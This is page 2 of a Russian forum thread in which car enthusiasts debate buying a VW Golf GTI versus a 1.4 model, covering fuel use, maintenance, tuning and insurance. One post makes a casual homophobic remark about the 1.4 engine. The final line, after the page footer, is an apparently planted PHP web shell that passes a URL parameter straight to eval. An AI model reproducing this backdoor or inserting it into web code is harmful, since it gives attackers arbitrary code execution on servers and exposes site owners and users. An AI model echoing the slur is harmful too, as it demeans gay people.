+ Ответить в теме
Страница 2 из 4 ПерваяПервая 1 2 3 4 ПоследняяПоследняя
Показано с 11 по 20 из 32

Тема: Покупка GTI, есть ли смысл ?


  1. #11
    GTI-Racing ftor is on a distinguished road Аватар для ftor
    Регистрация
    17.06.2010
    Откуда
    Москва
    Машина
    Белый Бричка Леон - продан, белый bmw f20 - продан, ищу что-то не белое
    Сообщений
    92
    Цитата Сообщение от esqre Посмотреть сообщение
    какой расход по городу у него ? Если спокойно ехать ?
    мой рекорд 5.0 - а так все от потока, пробок, светафоров зависит.
    На драйве посмотри - многие пишут свой расход.

  2. #12
    GTI-Racing Kamich is just really nice Kamich is just really nice Kamich is just really nice Kamich is just really nice Аватар для Kamich
    Регистрация
    23.06.2010
    Откуда
    Mascwa
    Машина
    FE V, ранее GTI 5 MT&DSG
    Сообщений
    1,666
    хнык хнык.. а какие аргументы за то, чтоб брать гти?
    Ездишь аккуратно. Волнуешься о расходе. Переживаешь за ремонтопригодность. Полный привод не нужен.. Бери хонду сивика- он же вечный! Или тойоту приус- там и надежно все и расход норм. И по трассе она 120 поедет.
    Ты не подумай ниче.. Я по доброму.
    Просто ГТИ нужен тогда, когда тебе нужно самому себе что то доказывать. Когда хочется какой то авантюры каждый день.
    А если тебя волнуют другие показатели авто, то и надо искать машину под свои требования. У ГТИ же еще и расход резины на передних колесах побольше, чем в среднем по больничке.
    In a world that's digital, we choose to be ANALOG.

  3. #13
    GTI-Racing ARTA is on a distinguished road Аватар для ARTA
    Регистрация
    11.12.2014
    Откуда
    Msk
    Машина
    MK6 GTI DSG
    Сообщений
    207
    ГТИ конечно не "аааахххх какая машина, чтобы потом детям рассказывать!")))))) Но если выбирать из предложенных вариантов, однозначно ГТИ.
    Обслуга одинаковая, разница только в налоге и расход немного больше...
    С другой стороны, нужно прокатиться на том и том, если разницы для себя не увидишь, бери поджопник 1.4.
    Хотя у меня ГТи именно , как поджпник))))

  4. #14
    Мимо проходил esqre is on a distinguished road Аватар для esqre
    Регистрация
    21.10.2015
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    29
    Нет, Вы меня не правильно поняли. Я просто человек такой. Так сказать практичный. Очень долго взвешиваю все "за " и "против". Вот и тут пытаюсь максимум узнать. Но на перекор свей "практичности" после 3х месячных обдумываний решил взять данное авто. Один раз живем, когда я еще на такой машине поезжу )

  5. #15
    GTI-Racing koct88 is on a distinguished road Аватар для koct88
    Регистрация
    30.10.2013
    Откуда
    MOskvabad
    Машина
    Golf mk6 GTI
    Сообщений
    256
    я так же думал и взял гти) каждый день кайфую)))
    + сделал ст.2... стал офигенный звук
    расход у меня по пробкам 11л на механике и около 10л без пробок)) ну я топлю... иногда вообще 14-15л
    но если ехать совсем спокойно, то я проезжал по трассе на одном баке 800-850км, я думаю если ехать постоянно 90-100, то и 900 взять можно :)
    а 1.4 это для геев

    п.с. я перед покупкой вообще думал мерина брать с300 класса w204 кузов... но потом подумал, что я же тогда в гольфа не сяду и никогда не смогу тюнинговать его))) а жизнь то идет и надо осуществить мечту )
    так что такие вот дела
    машина куплена 1 ноября 2013

  6. #16
    GTI-Racing ftor is on a distinguished road Аватар для ftor
    Регистрация
    17.06.2010
    Откуда
    Москва
    Машина
    Белый Бричка Леон - продан, белый bmw f20 - продан, ищу что-то не белое
    Сообщений
    92
    Цитата Сообщение от esqre Посмотреть сообщение
    Нет, Вы меня не правильно поняли. Я просто человек такой. Так сказать практичный. Очень долго взвешиваю все "за " и "против". Вот и тут пытаюсь максимум узнать. Но на перекор свей "практичности" после 3х месячных обдумываний решил взять данное авто. Один раз живем, когда я еще на такой машине поезжу )
    какая последняя машина у тебя была? с чего на гольфа пересесть решил?

  7. #17
    Мимо проходил Azoniques is on a distinguished road Аватар для Azoniques
    Регистрация
    02.09.2015
    Откуда
    Краснодар
    Машина
    golf
    Сообщений
    4
    А вообще, спрашивать на GTI клубе что лучше 1.4 или GTI это сильно) Как правило на подобных ресурсах количество объективных точек зрения стремится к нулю.
    А если по теме, то из своего опыта владения golf mk6 на моторе 1.4 всех модификаций(80, 122 и 160л.с.), а так же GTI - могу с уверенностью сказать: однозначно GTI. Обслуживание стоит одинаковых рублей, ну плюс/минус, но не в разы.
    И не стоит так бояться двухлитрового гольфа, ты же не STI-корчелыгу на тюнеге собрался брать. GTI обычный говородской автомобиль с очень хорошим потенциалом. Не бросайся на первый попавшийся экземпляр со словами "УУУ А**ТЬ ВАЛИТ БЕРУ", даже если первый экземпляр оказался очень хорош, то все равно посмотри еще один для сравнения и успокоения.

  8. #18
    GTI-Racing Yasik is on a distinguished road Аватар для Yasik
    Регистрация
    24.01.2013
    Откуда
    Msfnct
    Машина
    VW Golf 5 GTI
    Сообщений
    424
    Покупая ГТИ, ты прикасаешься к истории. И с точки зрения прагматизма, это один из лучших выборов на рынке. Ест он умеренно, ломается за недорого. Джереми Кларксон в свое время говорил, что если бы люди покупали бы машины только мозгами, все бы ездили на гольфах.

    Мне кажется, что за свои деньги это лучшая покупка, которая если и будет ломаться, то при этом не будет заставлять весь месяц до зарплаты сидеть на дошираке.

    Единственное, что сток ГТИ не дарит эмоций в принципе. Завел - поехал. Нажал - обогнал. Все пожалуй.

  9. #19
    Мимо проходил EvGen OG is on a distinguished road Аватар для EvGen OG
    Регистрация
    11.03.2015
    Откуда
    Люберцы
    Машина
    Golf GTI Mk6
    Сообщений
    13
    Цитата Сообщение от koct88 Посмотреть сообщение
    я так же думал и взял гти) каждый день кайфую)))
    + сделал ст.2... стал офигенный звук
    расход у меня по пробкам 11л на механике и около 10л без пробок)) ну я топлю... иногда вообще 14-15л
    но если ехать совсем спокойно, то я проезжал по трассе на одном баке 800-850км, я думаю если ехать постоянно 90-100, то и 900 взять можно :)
    а 1.4 это для геев

    п.с. я перед покупкой вообще думал мерина брать с300 класса w204 кузов... но потом подумал, что я же тогда в гольфа не сяду и никогда не смогу тюнинговать его))) а жизнь то идет и надо осуществить мечту )
    так что такие вот дела
    А я как раз из w204 С250 персел в GTI 6, тачка дарит эмоций столько, что мерен с ней не сравнится!
    Мерен брал новый в АМГ, на 50к пробега замена цепи по гарантии, потом замена масляного стакана, замена моторчика Start|Stop в коробке, откатал 2 года и как только кончилась гарантия полетела система охлаждения и ремонт выставили почти 300К..... Продал... в двигатель Мерса кстати не лез, все СТОК. Расход у мерса на 204лс 13-19л на 100 бензина (лил 98), КАСКО от 130 до 300к в год. Короче за 2 года я так наелся "премиум классом", что захотел себе нормальную городскую гонку.

    По Гольфу - расход от 7л по трассе до 9л в городе, при режиме "слабоумие и отвага" расход вырастает 13-15л (у меня пока полный сток). Подвеска, тормоза и впуск уже в гараже, жду весны, пилю выхлоп и ст2 РЕВО. А главное КАСКО - 60к. ТО - копейки, запчастей навалом.
    По коробке, кстати, после покупки (проег был 18к) заменил все жидкости включая масло в ДСГ. Менял в ДСГ Сервисе, ребята посоветовали замену каждые 30к.

    ПС - в Гольфе меня вообще не тормозят ГАИ, но и девочки на дороге не так ведутся как на мЭрс))))))
    "Меня *МАТ* перетараторишь, я король риторики"©
    "Тусуйся с нами, будешь без лавэ"

  10. #20
    Мимо проходил plast73 is on a distinguished road Аватар для plast73
    Регистрация
    13.09.2016
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    14
    А вот интересно, в 43 года наверное как то не серьезно покупать GTI?, просто владел гольфом 5 в свое время с мотором 1,6, уж очень нравилась машинка...

+ Ответить в теме
Страница 2 из 4 ПерваяПервая 1 2 3 4 ПоследняяПоследняя

Похожие темы

  1. Турбина T3/T4 ha G4 GTI AGU есть ли смысл?
    от daToxa в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 13
    Последнее сообщение: 01.10.2023, 15:47
  2. Ответов: 3
    Последнее сообщение: 11.02.2013, 13:33
  3. Реально ли поставить на Golf4Gti тормоза от скажем, пассата, и есть ли в этом смысл?
    от daToxa в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 18
    Последнее сообщение: 11.06.2009, 23:04
  4. Есть Ли Смысл?
    от Sonatik в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 8
    Последнее сообщение: 24.01.2009, 22:44
  5. Имеет смысл брать Golf IV 1,8T за 12-13 Кб?
    от Fugu в разделе Отзывы / Выбор
    Ответов: 6
    Последнее сообщение: 30.09.2006, 15:36

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}